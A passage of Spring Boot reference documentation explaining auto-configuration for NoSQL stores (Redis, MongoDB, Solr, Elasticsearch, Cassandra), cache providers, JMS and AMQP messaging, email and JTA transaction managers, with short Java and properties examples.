`TransactionProvider`\n* `RecordMapperProvider`\n* `RecordListenerProvider`\n* `ExecuteListenerProvider`\n* `VisitListenerProvider`\n\nYou can also create your own `org.jooq.Configuration` `@Bean` if you want to take\ncomplete control of the jOOQ configuration.\n\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nCassandra; you can make use of the other projects, but you will need to configure them\nyourself. 
Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the\nhttps:\/\/github.com\/xetorthio\/jedis\/[Jedis] client library and abstractions on top of it\nprovided by https:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There\nis a `spring-boot-starter-redis` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (except in the case of `RedisTemplate` the exclusion is based on the bean name\n'`redisTemplate`' not its type). If `commons-pool2` is on the classpath you will get a\npooled connection factory by default.\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the\n`spring-boot-starter-data-mongodb` '`Starter POM`'.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `org.springframework.data.mongodb.MongoDbFactory` to\naccess Mongo databases. By default the instance will attempt to connect to a MongoDB\nserver using the URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport org.springframework.data.mongodb.MongoDbFactory;\n\timport com.mongodb.DB;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoDbFactory mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoDbFactory mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t\tpublic void example() {\n\t\t\tDB db = mongo.getDb();\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nYou can set `spring.data.mongodb.uri` property to change the URL and configure\nadditional settings such as the _replica set_:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.uri=mongodb:\/\/user:secret@mongo1.example.com:12345,mongo2.example.com:23456\/test\n----\n\nAlternatively, as long as you're using Mongo 2.x, specify a `host`\/`port`. For example,\nyou might declare the following in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nNOTE: `spring.data.mongodb.host` and `spring.data.mongodb.port` are not supported if\nyou're using the Mongo 3.0 Java driver. In such cases, `spring.data.mongodb.uri` should be\nused to provide all of the configuration.\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. 
You\ncould simply delete this line from the sample above.\n\nTIP: If you aren't using Spring Data Mongo you can inject `com.mongodb.Mongo` beans\ninstead of using `MongoDbFactory`.\n\nYou can also declare your own `MongoDbFactory` or `Mongo` bean if you want to take\ncomplete control of establishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a\n{spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`] class that is very\nsimilar in its design to Spring's `JdbcTemplate`. As with `JdbcTemplate` Spring Boot\nauto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that `City`\nis now a Mongo data class rather than a JPA `@Entity`, it will work in the same way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-mongo-embedded]]\n==== Embedded Mongo\nSpring Boot offers auto-configuration for\nhttps:\/\/github.com\/flapdoodle-oss\/de.flapdoodle.embed.mongo[Embedded Mongo]. To use\nit in your Spring Boot application add a dependency on\n`de.flapdoodle.embed:de.flapdoodle.embed.mongo`.\n\nThe port that Mongo will listen on can be configured using the `spring.data.mongodb.port`\nproperty. To use a randomly allocated free port use a value of zero. The `MongoClient`\ncreated by `MongoAutoConfiguration` will be automatically configured to use the randomly\nallocated port.\n\nIf you have SLF4J on the classpath, output produced by Mongo will be automatically routed\nto a logger named `org.springframework.boot.autoconfigure.mongo.embedded.EmbeddedMongo`.\n\nYou can declare your own `IMongodConfig` and `IRuntimeConfig` beans to take control of the\nMongo instance's configuration and logging routing.\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the\nhttp:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire] data management\nplatform. 
There is a `spring-boot-starter-data-gemfire` '`Starter POM`' for collecting the\ndependencies in a convenient way. There is currently no auto-configuration support for\nGemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation (`@EnableGemfireRepositories`)].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the Solr 4 client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. There is\na `spring-boot-starter-data-solr` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\nTIP: Solr 5 is currently not supported and the auto-configuration will not be enabled by\na Solr 5 dependency.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nbean. By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elasticsearch] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nthe Elasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. 
a `TransportClient`) by setting\n`spring.data.elasticsearch.cluster-nodes` to a comma-separated '`host:port`' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-cassandra]]\n=== Cassandra\nhttp:\/\/cassandra.apache.org\/[Cassandra] is an open source, distributed database management\nsystem designed to handle large amounts of data across many commodity servers. Spring Boot\noffers auto-configuration for Cassandra and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-cassandra[Spring Data Cassandra].\nThere is a `spring-boot-starter-data-cassandra` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-cassandra]]\n==== Connecting to Cassandra\nYou can inject an auto-configured `CassandraTemplate` or a Cassandra `Session`\ninstance as you would any other Spring Bean. The `spring.data.cassandra.*` properties\ncan be used to customize the connection. Generally you will to provide `keyspace-name`\nand `contact-points` properties:\n\n[source,properties,indent=0]\n----\n\tspring.data.cassandra.keyspace-name=mykeyspace\n\tspring.data.cassandra.contact-points=cassandrahost1,cassandrahost2\n----\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate CassandraTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(CassandraTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `CassandraTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-cassandra-repositories]]\n==== Spring Data Cassandra repositories\nSpring Data includes basic repository support for Cassandra. Currently this is more\nlimited than the JPA repositories discussed earlier, and will need to annotate finder\nmethods with `@Query`.\n\nTIP: For complete details of Spring Data Cassandra, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/cassandra\/docs\/[reference documentation].\n\n\n\n[[boot-features-caching]]\n== Caching\nThe Spring Framework provides support for transparently adding caching to an application.\nAt its core, the abstraction applies caching to methods, reducing thus the number of\nexecutions based on the information available in the cache. 
The caching logic is applied\ntransparently, without any interference to the invoker.\n\nNOTE: Check the {spring-reference}\/#cache[relevant section] of the Spring Framework\nreference for more details.\n\nIn a nutshell, adding caching to an operation of your service is as easy as adding the\nrelevant annotation to its method:\n\n[source,java,indent=0]\n----\n\timport javax.cache.annotation.CacheResult;\n\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MathService {\n\n\t\t@CacheResult\n\t\tpublic int computePiDecimal(int i) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nNOTE: You can either use the standard JSR-107 (JCache) annotations or Spring's own\ncaching annotations transparently. We strongly advise you however to not mix and match\nthem.\n\nTIP: It is also possible to {spring-reference}\/#cache-annotations-put[update] or\n{spring-reference}\/#cache-annotations-evict[evict] data from the cache transparently.\n\n\n\n=== Supported cache providers\nThe cache abstraction does not provide an actual store and relies on abstraction\nmaterialized by the `org.springframework.cache.Cache` and\n`org.springframework.cache.CacheManager` interfaces. Spring Boot auto-configures a\nsuitable `CacheManager` according to the implementation as long as the caching support is\nenabled via the `@EnableCaching` annotation.\n\nTIP: Use the `spring-boot-starter-cache` \"`Starter POM`\" to quickly add required caching\ndependencies. If you are adding dependencies manually you should note that certain\nimplementations are only provided by the `spring-context-support` jar.\n\nSpring Boot tries to detect the following providers (in this order):\n\n* <<boot-features-caching-provider-generic,Generic>>\n* <<boot-features-caching-provider-jcache,JCache (JSR-107)>>\n* <<boot-features-caching-provider-ehcache2,EhCache 2.x>>\n* <<boot-features-caching-provider-hazelcast,Hazelcast>>\n* <<boot-features-caching-provider-infinispan,Infinispan>>\n* <<boot-features-caching-provider-redis,Redis>>\n* <<boot-features-caching-provider-guava,Guava>>\n* <<boot-features-caching-provider-simple,Simple>>\n\nIt is also possible to _force_ the cache provider to use via the `spring.cache.type`\nproperty.\n\n\n\n[[boot-features-caching-provider-generic]]\n==== Generic\nGeneric caching is used if the context defines _at least_ one\n`org.springframework.cache.Cache` bean, a `CacheManager` wrapping them is configured.\n\n\n\n[[boot-features-caching-provider-jcache]]\n==== JCache\nJCache is bootstrapped via the presence of a `javax.cache.spi.CachingProvider` on the\nclasspath (i.e. a JSR-107 compliant caching library). It might happen than more that one\nprovider is present, in which case the provider must be explicitly specified. Even if the\nJSR-107 standard does not enforce a standardized way to define the location of the\nconfiguration file, Spring Boot does its best to accommodate with implementation details.\n\n[source,properties,indent=0]\n----\n # Only necessary if more than one provider is present\n\tspring.cache.jcache.provider=com.acme.MyCachingProvider\n\tspring.cache.jcache.config=classpath:acme.xml\n----\n\nNOTE: Since a cache library may offer both a native implementation and JSR-107 support\nSpring Boot will prefer the JSR-107 support so that the same features are available if\nyou switch to a different JSR-107 implementation.\n\nThere are several ways to customize the underlying `javax.cache.cacheManager`:\n\n* Caches can be created on startup via the `spring.cache.cache-names` property. 
If a custom\n`javax.cache.configuration.Configuration` bean is defined, it is used to customize them.\n* `org.springframework.boot.autoconfigure.cache.JCacheManagerCustomizer` beans are\ninvoked with the reference of the `CacheManager` for full customization.\n\nTIP: If a standard `javax.cache.CacheManager` bean is defined, it is wrapped\nautomatically in a `org.springframework.cache.CacheManager` implementation that the\nabstraction expects. No further customization is applied on it.\n\n\n\n[[boot-features-caching-provider-ehcache2]]\n==== EhCache 2.x\nEhCache 2.x is used if a file named `ehcache.xml` can be found at the root of the\nclasspath. If EhCache 2.x and such file is present it is used to bootstrap the cache\nmanager. An alternate configuration file can be provide a well using:\n\n[source,properties,indent=0]\n----\n\tspring.cache.ehcache.config=classpath:config\/another-config.xml\n----\n\n\n\n[[boot-features-caching-provider-hazelcast]]\n==== Hazelcast\n\nSpring Boot has a <<boot-features-hazelcast,general support for Hazelcast>>. If\na `HazelcastInstance` has been auto-configured, it is automatically wrapped in a\n`CacheManager`.\n\nIf for some reason you need a different `HazelcastInstance` for caching, you can\nrequest Spring Boot to create a separate one that will be only used by the\n`CacheManager`:\n\n[source,properties,indent=0]\n----\n\tspring.cache.hazelcast.config=classpath:config\/my-cache-hazelcast.xml\n----\n\nTIP: If a separate `HazelcastInstance` is created that way, it is not registered\nin the application context.\n\n\n\n[[boot-features-caching-provider-infinispan]]\n==== Infinispan\nInfinispan has no default configuration file location so it must be specified explicitly\n(or the default bootstrap is used).\n\n[source,properties,indent=0]\n----\n\tspring.cache.infinispan.config=infinispan.xml\n----\n\nCaches can be created on startup via the `spring.cache.cache-names` property. If a custom\n`ConfigurationBuilder` bean is defined, it is used to customize them.\n\n\n\n[[boot-features-caching-provider-redis]]\n==== Redis\nIf Redis is available and configured, the `RedisCacheManager` is auto-configured. It is\nalso possible to create additional caches on startup using the `spring.cache.cache-names`\nproperty.\n\n\n\n[[boot-features-caching-provider-guava]]\n==== Guava\nIf Guava is present, a `GuavaCacheManager` is auto-configured. Caches can be created\non startup using the `spring.cache.cache-names` property and customized by one of the\nfollowing (in this order):\n\n1. A cache spec defined by `spring.cache.guava.spec`\n2. A `com.google.common.cache.CacheBuilderSpec` bean is defined\n3. A `com.google.common.cache.CacheBuilder` bean is defined\n\nFor instance, the following configuration creates a `foo` and `bar` caches with a maximum\nsize of 500 and a _time to live_ of 10 minutes\n\n[source,properties,indent=0]\n----\n spring.cache.cache-names=foo,bar\n\tspring.cache.guava.spec=maximumSize=500,expireAfterAccess=600s\n----\n\nBesides, if a `com.google.common.cache.CacheLoader` bean is defined, it is automatically\nassociated to the `GuavaCacheManager`.\n\n\n\n[[boot-features-caching-provider-simple]]\n==== Simple\nIf none of these options worked out, a simple implementation using `ConcurrentHashMap`\nas cache store is configured. 
This is the default if no caching library is present in\nyour application.\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. Spring AMQP provides a similar feature set for the\n'`Advanced Message Queuing Protocol`' and Spring Boot also provides auto-configuration\noptions for `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging\nnatively in Spring WebSocket and Spring Boot has support for that through starters and a\nsmall amount of auto-configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details). Spring Boot also auto-configures the necessary infrastructure\nto send and receive messages.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`+spring.activemq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee\n{sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-artemis]]\n==== Artemis support\nApache Artemis was formed in 2015 when HornetQ was donated to the Apache Foundation. All\nthe features listed in the <<boot-features-hornetq>> section below can be applied to\nArtemis. Simply replace `+++spring.hornetq.*+++` properties with `+++spring.artemis.*+++`\nand use `spring-boot-starter-artemis` instead of `spring-boot-starter-hornetq`.\n\nNOTE: You should not try and use Artemis and HornetQ and the same time.\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available in the classpath), and `native` to connect\nto a broker using the `netty` transport protocol. 
When the latter is configured, Spring\nBoot configures a `ConnectionFactory` connecting to a broker running on the local machine\nwith the default settings.\n\nNOTE: If you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`+spring.hornetq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can choose if you want to enable persistence, and the list\nof destinations that should be made available. These can be specified as a comma-separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee\n{sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the '`name`' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-jms-jndi]]\n==== Using a JNDI ConnectionFactory\nIf you are running your application in an Application Server Spring Boot will attempt to\nlocate a JMS `ConnectionFactory` using JNDI. By default the locations `java:\/JmsXA` and\n`java:\/XAConnectionFactory` will be checked. You can use the\n`spring.jms.jndi-name` property if you need to specify an alternative location:\n\n[source,properties,indent=0]\n----\n\tspring.jms.jndi-name=java:\/MyConnectionFactory\n----\n\n\n\n[[boot-features-using-jms-sending]]\n==== Sending a message\nSpring's `JmsTemplate` is auto-configured and you can autowire it directly into your own\nbeans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-javadoc}\/jms\/core\/JmsMessagingTemplate.{dc-ext}[`JmsMessagingTemplate`]\ncan be injected in a similar manner.\n\n\n\n[[boot-features-using-jms-receiving]]\n==== Receiving a message\n\nWhen the JMS infrastructure is present, any bean can be annotated with `@JmsListener` to\ncreate a listener endpoint. If no `JmsListenerContainerFactory` has been defined, a\ndefault one is configured automatically.\n\nThe default factory is transactional by default. If you are running in an infrastructure\nwhere a `JtaTransactionManager` is present, it will be associated to the listener container\nby default. If not, the `sessionTransacted` flag will be enabled. In that latter scenario,\nyou can associate your local data store transaction to the processing of an incoming message\nby adding `@Transactional` on your listener method (or a delegate thereof). 
This will make\nsure that the incoming message is acknowledged once the local transaction has completed. This\nalso includes sending response messages that have been performed on the same JMS session.\n\nThe following component creates a listener endpoint on the `someQueue` destination:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@JmsListener(destination = \"someQueue\")\n\t\tpublic void processMessage(String content) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nTIP: Check {spring-javadoc}\/jms\/annotation\/EnableJms.{dc-ext}[the Javadoc of `@EnableJms`] for\nmore details.\n\n\n\n[[boot-features-amqp]]\n=== AMQP\nThe Advanced Message Queuing Protocol (AMQP) is a platform-neutral, wire-level protocol\nfor message-oriented middleware. The Spring AMQP project applies core Spring concepts to\nthe development of AMQP-based messaging solutions.\n\n\n\n[[boot-features-rabbitmq]]\n==== RabbitMQ support\nRabbitMQ is a lightweight, reliable, scalable and portable message broker based on the\nAMQP protocol. Spring uses `RabbitMQ` to communicate using the AMQP protocol.\n\nRabbitMQ configuration is controlled by external configuration properties in\n`+spring.rabbitmq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.rabbitmq.host=localhost\n\tspring.rabbitmq.port=5672\n\tspring.rabbitmq.username=admin\n\tspring.rabbitmq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[`RabbitProperties`]\nfor more of the supported options.\n\nTIP: Check http:\/\/spring.io\/blog\/2010\/06\/14\/understanding-amqp-the-protocol-used-by-rabbitmq\/[Understanding AMQP, the protocol used by RabbitMQ]\nfor more details.\n\n\n\n[[boot-features-using-amqp-sending]]\n==== Sending a message\nSpring's `AmqpTemplate` and `AmqpAdmin` are auto-configured and you can autowire them\ndirectly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.amqp.core.AmqpAdmin;\n\timport org.springframework.amqp.core.AmqpTemplate;\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final AmqpAdmin amqpAdmin;\n\t\tprivate final AmqpTemplate amqpTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(AmqpAdmin amqpAdmin, AmqpTemplate amqpTemplate) {\n\t\t\tthis.amqpAdmin = amqpAdmin;\n\t\t\tthis.amqpTemplate = amqpTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-amqp-javadoc}\/rabbit\/core\/RabbitMessagingTemplate.{dc-ext}[`RabbitMessagingTemplate`]\ncan be injected in a similar manner.\n\nAny `org.springframework.amqp.core.Queue` that is defined as a bean will be automatically\nused to declare a corresponding queue on the RabbitMQ instance if necessary.\n\n\n\n[[boot-features-using-amqp-receiving]]\n==== Receiving a message\nWhen the Rabbit infrastructure is present, any bean can be annotated with\n`@RabbitListener` to create a listener endpoint. 
If no `RabbitListenerContainerFactory`\nhas been defined, a default one is configured automatically.\n\nThe following component creates a listener endpoint on the `someQueue` queue:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@RabbitListener(queues = \"someQueue\")\n\t\tpublic void processMessage(String content) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nTIP: Check {spring-amqp-javadoc}\/rabbit\/annotation\/EnableRabbit.{dc-ext}[the Javadoc of `@EnableRabbit`]\nfor more details.\n\n\n\n[[boot-features-email]]\n== Sending email\nThe Spring Framework provides an easy abstraction for sending email using the\n`JavaMailSender` interface and Spring Boot provides auto-configuration for it as well as\na starter module.\n\nTIP: Check the {spring-reference}\/#mail[reference documentation] for a detailed\nexplanation of how you can use `JavaMailSender`.\n\nIf `spring.mail.host` and the relevant libraries (as defined by\n`spring-boot-starter-mail`) are available, a default `JavaMailSender` is created if none\nexists. The sender can be further customized by configuration items from the `spring.mail`\nnamespace, see the\n{sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[`MailProperties`] for more\ndetails.\n\n\n\n[[boot-features-jta]]\n== Distributed Transactions with JTA\nSpring Boot supports distributed JTA transactions across multiple XA resources using\neither an http:\/\/www.atomikos.com\/[Atomikos] or https:\/\/github.com\/bitronix\/btm[Bitronix]\nembedded transaction manager. JTA transactions are also supported when deploying to a\nsuitable Java EE Application Server.\n\nWhen a JTA environment is detected, Spring's `JtaTransactionManager` will be used to\nmanage transactions. Auto-configured JMS, DataSource and JPA beans will be upgraded to\nsupport XA transactions. You can use standard Spring idioms such as `@Transactional` to\nparticipate in a distributed transaction. If you are within a JTA environment and still\nwant to use local transactions you can set the `spring.jta.enabled` property to `false` to\ndisable the JTA auto-configuration.\n\n\n\n=== Using an Atomikos transaction manager\nAtomikos is a popular open source transaction manager which can be embedded into your\nSpring Boot application. You can use the `spring-boot-starter-jta-atomikos` Starter POM to\npull in the appropriate Atomikos libraries. Spring Boot will auto-configure Atomikos and\nensure that appropriate `depends-on` settings are applied to your Spring beans for correct\nstartup and shutdown ordering.\n\nBy default Atomikos transaction logs will be written to a `transaction-logs` directory in\nyour application home directory (the directory in which your application jar file\nresides). You can customize this directory by setting a `spring.jta.log-dir` property in\nyour `application.properties` file. Properties starting `spring.jta.` can also be used to\ncustomize the Atomikos `UserTransactionServiceImp`. See the\n{dc-spring-boot}\/jta\/atomikos\/AtomikosProperties.{dc-ext}[`AtomikosProperties` Javadoc]\nfor complete details.\n\nNOTE: To ensure that multiple transaction managers can safely coordinate the same\nresource managers, each Atomikos instance must be configured with a unique ID. By default\nthis ID is the IP address of the machine on which Atomikos is running. 
